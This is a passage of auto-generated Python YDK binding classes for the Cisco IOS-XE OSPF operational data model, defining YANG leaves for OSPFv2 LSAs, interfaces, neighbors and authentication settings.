'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo, self).__init__() self.yang_name = "link-topo" self.yang_parent_name = "ospfv2-router-lsa-links" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = 
OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric', (YLeaf(YType.uint16, 'topo-metric'), ['int'])), ]) self.mt_id = None self.topo_metric = None self._segment_path = lambda: "link-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo, ['mt_id', 'topo_metric'], name, value) class UnsupportedLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa, self).__init__() self.yang_name = "unsupported-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('lsa_data', (YLeafList(YType.uint8, 'lsa-data'), ['int'])), ]) self.lsa_data = [] self._segment_path = lambda: "unsupported-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa, ['lsa_data'], name, value) class RouterLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa, self).__init__() self.yang_name = "router-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('router_lsa_bits', (YLeaf(YType.bits, 'router-lsa-bits'), ['Bits'])), ('router_lsa_number_links', (YLeaf(YType.uint16, 'router-lsa-number-links'), ['int'])), ]) self.router_lsa_bits = Bits() self.router_lsa_number_links = None self._segment_path = lambda: "router-lsa" self._is_frozen = True def __setattr__(self, name, value): 
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa, ['router_lsa_bits', 'router_lsa_number_links'], name, value) class NetworkLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa, self).__init__() self.yang_name = "network-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('network_lsa_mask', (YLeaf(YType.uint32, 'network-lsa-mask'), ['int'])), ('network_attached_routers', (YLeafList(YType.uint32, 'network-attached-routers'), ['int'])), ]) self.network_lsa_mask = None self.network_attached_routers = [] self._segment_path = lambda: "network-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa, ['network_lsa_mask', 'network_attached_routers'], name, value) class NetworkSummaryLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa, self).__init__() self.yang_name = "network-summary-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo))]) self._leafs = OrderedDict([ ('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])), ]) self.summary_lsa_mask = None self.summary_topo = YList(self) self._segment_path = lambda: "network-summary-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa, ['summary_lsa_mask'], name, value) class 
SummaryTopo(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo, self).__init__() self.yang_name = "summary-topo" self.yang_parent_name = "network-summary-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ]) self.mt_id = None self.topo_metric = None self._segment_path = lambda: "summary-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value) class RouterSummaryLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa, self).__init__() self.yang_name = "router-summary-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo))]) self._leafs = OrderedDict([ ('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])), ]) self.summary_lsa_mask = None self.summary_topo = YList(self) self._segment_path = lambda: "router-summary-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa, ['summary_lsa_mask'], name, value) class SummaryTopo(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo, self).__init__() self.yang_name = 
"summary-topo" self.yang_parent_name = "router-summary-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ]) self.mt_id = None self.topo_metric = None self._segment_path = lambda: "summary-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value) class ExternalLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa, self).__init__() self.yang_name = "external-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo))]) self._leafs = OrderedDict([ ('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])), ]) self.external_lsa_mask = None self.external_topo = YList(self) self._segment_path = lambda: "external-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa, ['external_lsa_mask'], name, value) class ExternalTopo(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo, self).__init__() self.yang_name = "external-topo" self.yang_parent_name = "external-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), 
['int'])), ('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])), ('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])), ]) self.mt_id = None self.topo_metric_type = None self.topo_metric = None self.topo_forwarding_address = None self.topo_route_tag = None self._segment_path = lambda: "external-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value) class NssaLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa, self).__init__() self.yang_name = "nssa-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo))]) self._leafs = OrderedDict([ ('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])), ]) self.external_lsa_mask = None self.external_topo = YList(self) self._segment_path = lambda: "nssa-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa, ['external_lsa_mask'], name, value) class ExternalTopo(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo, self).__init__() self.yang_name = "external-topo" self.yang_parent_name = "nssa-lsa" 
self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])), ('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])), ]) self.mt_id = None self.topo_metric_type = None self.topo_metric = None self.topo_forwarding_address = None self.topo_route_tag = None self._segment_path = lambda: "external-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value) class Ospfv2Interface(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface, self).__init__() self.yang_name = "ospfv2-interface" self.yang_parent_name = "ospfv2-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['name'] self._child_classes = OrderedDict([("ttl-security-val", ("ttl_security_val", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal)), ("auth-val", ("auth_val", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal)), ("ospfv2-neighbor", ("ospfv2_neighbor", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor))]) self._leafs = OrderedDict([ ('name', (YLeaf(YType.str, 'name'), ['str'])), ('network_type', (YLeaf(YType.enumeration, 'network-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfNetworkType', '')])), ('enable', (YLeaf(YType.boolean, 'enable'), 
['bool'])), ('passive', (YLeaf(YType.boolean, 'passive'), ['bool'])), ('demand_circuit', (YLeaf(YType.boolean, 'demand-circuit'), ['bool'])), ('mtu_ignore', (YLeaf(YType.boolean, 'mtu-ignore'), ['bool'])), ('prefix_suppresion', (YLeaf(YType.boolean, 'prefix-suppresion'), ['bool'])), ('cost', (YLeaf(YType.uint16, 'cost'), ['int'])), ('hello_interval', (YLeaf(YType.uint16, 'hello-interval'), ['int'])), ('dead_interval', (YLeaf(YType.uint16, 'dead-interval'), ['int'])), ('retransmit_interval', (YLeaf(YType.uint16, 'retransmit-interval'), ['int'])), ('transmit_delay', (YLeaf(YType.uint16, 'transmit-delay'), ['int'])), ('hello_timer', (YLeaf(YType.uint32, 'hello-timer'), ['int'])), ('wait_timer', (YLeaf(YType.uint32, 'wait-timer'), ['int'])), ('dr', (YLeaf(YType.uint32, 'dr'), ['int'])), ('bdr', (YLeaf(YType.uint32, 'bdr'), ['int'])), ('dr_ip', (YLeaf(YType.str, 'dr-ip'), ['str','str'])), ('bdr_ip', (YLeaf(YType.str, 'bdr-ip'), ['str','str'])), ('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'Ospfv2IntfState', '')])), ]) self.name = None self.network_type = None self.enable = None self.passive = None self.demand_circuit = None self.mtu_ignore = None self.prefix_suppresion = None self.cost = None self.hello_interval = None self.dead_interval = None self.retransmit_interval = None self.transmit_delay = None self.hello_timer = None self.wait_timer = None self.dr = None self.bdr = None self.dr_ip = None self.bdr_ip = None self.state = None self.ttl_security_val = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal() self.ttl_security_val.parent = self self._children_name_map["ttl_security_val"] = "ttl-security-val" self.auth_val = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal() self.auth_val.parent = self self._children_name_map["auth_val"] = "auth-val" self.ospfv2_neighbor = YList(self) self._segment_path = lambda: "ospfv2-interface" + "[name='" + str(self.name) + "']" self._is_frozen = 
True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface, ['name', 'network_type', 'enable', 'passive', 'demand_circuit', 'mtu_ignore', 'prefix_suppresion', 'cost', 'hello_interval', 'dead_interval', 'retransmit_interval', 'transmit_delay', 'hello_timer', 'wait_timer', 'dr', 'bdr', 'dr_ip', 'bdr_ip', 'state'], name, value) class TtlSecurityVal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal, self).__init__() self.yang_name = "ttl-security-val" self.yang_parent_name = "ospfv2-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('enable', (YLeaf(YType.boolean, 'enable'), ['bool'])), ('hops', (YLeaf(YType.int32, 'hops'), ['int'])), ]) self.enable = None self.hops = None self._segment_path = lambda: "ttl-security-val" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal, ['enable', 'hops'], name, value) class AuthVal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal, self).__init__() self.yang_name = "auth-val" self.yang_parent_name = "ospfv2-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("auth-key", ("auth_key", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey)), ("key-chain", ("key_chain", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain))]) self._leafs = OrderedDict([ ('no_auth', (YLeaf(YType.uint32, 'no-auth'), ['int'])), ]) self.no_auth = None self.auth_key = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey() self.auth_key.parent = self 
self._children_name_map["auth_key"] = "auth-key" self.key_chain = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain() self.key_chain.parent = self self._children_name_map["key_chain"] = "key-chain" self._segment_path = lambda: "auth-val" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal, ['no_auth'], name, value) class AuthKey(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey, self).__init__() self.yang_name = "auth-key" self.yang_parent_name = "auth-val" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('key_id', (YLeaf(YType.uint8, 'key-id'), ['int'])), ('key_string', (YLeafList(YType.uint8, 'key-string'), ['int'])), ('crypto_algo', (YLeaf(YType.enumeration, 'crypto-algo'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'Ospfv2CryptoAlgorithm', '')])), ]) self.key_id = None self.key_string = [] self.crypto_algo = None self._segment_path = lambda: "auth-key" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey, ['key_id', 'key_string', 'crypto_algo'], name, value) class KeyChain(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain, self).__init__() self.yang_name = "key-chain" self.yang_parent_name = "auth-val" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('key_chain', (YLeafList(YType.uint8, 'key-chain'), ['int'])), ]) self.key_chain = [] self._segment_path = lambda: "key-chain" self._is_frozen = True def __setattr__(self, 
name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain, ['key_chain'], name, value) class Ospfv2Neighbor(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor, self).__init__() self.yang_name = "ospfv2-neighbor" self.yang_parent_name = "ospfv2-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['nbr_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('nbr_id', (YLeaf(YType.uint32, 'nbr-id'), ['int'])), ('address', (YLeaf(YType.str, 'address'), ['str','str'])), ('dr', (YLeaf(YType.uint32, 'dr'), ['int'])), ('bdr', (YLeaf(YType.uint32, 'bdr'), ['int'])), ('dr_ip', (YLeaf(YType.str, 'dr-ip'), ['str','str'])), ('bdr_ip', (YLeaf(YType.str, 'bdr-ip'), ['str','str'])), ('event_count', (YLeaf(YType.uint32, 'event-count'), ['int'])), ('retrans_count', (YLeaf(YType.uint32, 'retrans-count'), ['int'])), ('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'NbrStateType', '')])), ('dead_timer', (YLeaf(YType.uint32, 'dead-timer'), ['int'])), ]) self.nbr_id = None self.address = None self.dr = None self.bdr = None self.dr_ip = None self.bdr_ip = None self.event_count = None self.retrans_count = None self.state = None self.dead_timer = None self._segment_path = lambda: "ospfv2-neighbor" + "[nbr-id='" + str(self.nbr_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor, ['nbr_id', 'address', 'dr', 'bdr', 'dr_ip', 'bdr_ip', 'event_count', 'retrans_count', 'state', 'dead_timer'], name, value) class Ospfv2LsdbExternal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal, self).__init__() self.yang_name = "ospfv2-lsdb-external" 
self.yang_parent_name = "ospfv2-instance" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_type','lsa_id','advertising_router'] self._child_classes = OrderedDict([("ospfv2-router-lsa-links", ("ospfv2_router_lsa_links", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks)), ("unsupported-lsa", ("unsupported_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa)), ("router-lsa", ("router_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa)), ("network-lsa", ("network_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa)), ("network-summary-lsa", ("network_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa)), ("router-summary-lsa", ("router_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa)), ("external-lsa", ("external_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa)), ("nssa-lsa", ("nssa_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa))]) self._leafs = OrderedDict([ ('lsa_type', (YLeaf(YType.uint8, 'lsa-type'), ['int'])), ('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])), ('advertising_router', (YLeaf(YType.uint32, 'advertising-router'), ['int'])), ('lsa_age', (YLeaf(YType.uint16, 'lsa-age'), ['int'])), ('lsa_options', (YLeaf(YType.bits, 'lsa-options'), ['Bits'])), ('lsa_seq_number', (YLeaf(YType.uint32, 'lsa-seq-number'), ['int'])), ('lsa_checksum', (YLeaf(YType.uint16, 'lsa-checksum'), ['int'])), ('lsa_length', (YLeaf(YType.uint16, 'lsa-length'), ['int'])), ]) self.lsa_type = None self.lsa_id = None self.advertising_router = None self.lsa_age = None self.lsa_options = Bits() self.lsa_seq_number = None self.lsa_checksum = None self.lsa_length = None self.unsupported_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa() self.unsupported_lsa.parent = self self._children_name_map["unsupported_lsa"] = "unsupported-lsa" self.router_lsa = 
OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa() self.router_lsa.parent = self self._children_name_map["router_lsa"] = "router-lsa" self.network_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa() self.network_lsa.parent = self self._children_name_map["network_lsa"] = "network-lsa" self.network_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa() self.network_summary_lsa.parent = self self._children_name_map["network_summary_lsa"] = "network-summary-lsa" self.router_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa() self.router_summary_lsa.parent = self self._children_name_map["router_summary_lsa"] = "router-summary-lsa" self.external_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa() self.external_lsa.parent = self self._children_name_map["external_lsa"] = "external-lsa" self.nssa_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa() self.nssa_lsa.parent = self self._children_name_map["nssa_lsa"] = "nssa-lsa" self.ospfv2_router_lsa_links = YList(self) self._segment_path = lambda: "ospfv2-lsdb-external" + "[lsa-type='" + str(self.lsa_type) + "']" + "[lsa-id='" + str(self.lsa_id) + "']" + "[advertising-router='" + str(self.advertising_router) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal, ['lsa_type', 'lsa_id', 'advertising_router', 'lsa_age', 'lsa_options', 'lsa_seq_number', 'lsa_checksum', 'lsa_length'], name, value) class Ospfv2RouterLsaLinks(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks, self).__init__() self.yang_name = "ospfv2-router-lsa-links" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['link_type','link_id','link_data'] self._child_classes = OrderedDict([("link-topo", 
("link_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo))]) self._leafs = OrderedDict([ ('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])), ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])), ]) self.link_type = None self.link_id = None self.link_data = None self.link_topo = YList(self) self._segment_path = lambda: "ospfv2-router-lsa-links" + "[link-type='" + str(self.link_type) + "']" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks, ['link_type', 'link_id', 'link_data'], name, value) class LinkTopo(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo, self).__init__() self.yang_name = "link-topo" self.yang_parent_name = "ospfv2-router-lsa-links" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric', (YLeaf(YType.uint16, 'topo-metric'), ['int'])), ]) self.mt_id = None self.topo_metric = None self._segment_path = lambda: "link-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo, ['mt_id', 'topo_metric'], name, value) class UnsupportedLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa, self).__init__() self.yang_name = "unsupported-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = 
OrderedDict([]) self._leafs = OrderedDict([ ('lsa_data', (YLeafList(YType.uint8, 'lsa-data'), ['int'])), ]) self.lsa_data = [] self._segment_path = lambda: "unsupported-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa, ['lsa_data'], name, value) class RouterLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa, self).__init__() self.yang_name = "router-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('router_lsa_bits', (YLeaf(YType.bits, 'router-lsa-bits'), ['Bits'])), ('router_lsa_number_links', (YLeaf(YType.uint16, 'router-lsa-number-links'), ['int'])), ]) self.router_lsa_bits = Bits() self.router_lsa_number_links = None self._segment_path = lambda: "router-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa, ['router_lsa_bits', 'router_lsa_number_links'], name, value) class NetworkLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa, self).__init__() self.yang_name = "network-lsa" self.yang_parent_name = "ospfv2-lsdb-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('network_lsa_mask', (YLeaf(YType.uint32, 'network-lsa-mask'), ['int'])), ('network_attached_routers', (YLeafList(YType.uint32, 'network-attached-routers'), ['int'])), ]) self.network_lsa_mask = None self.network_attached_routers = [] self._segment_path = lambda: "network-lsa" self._is_frozen = True def __setattr__(self, name, value): 
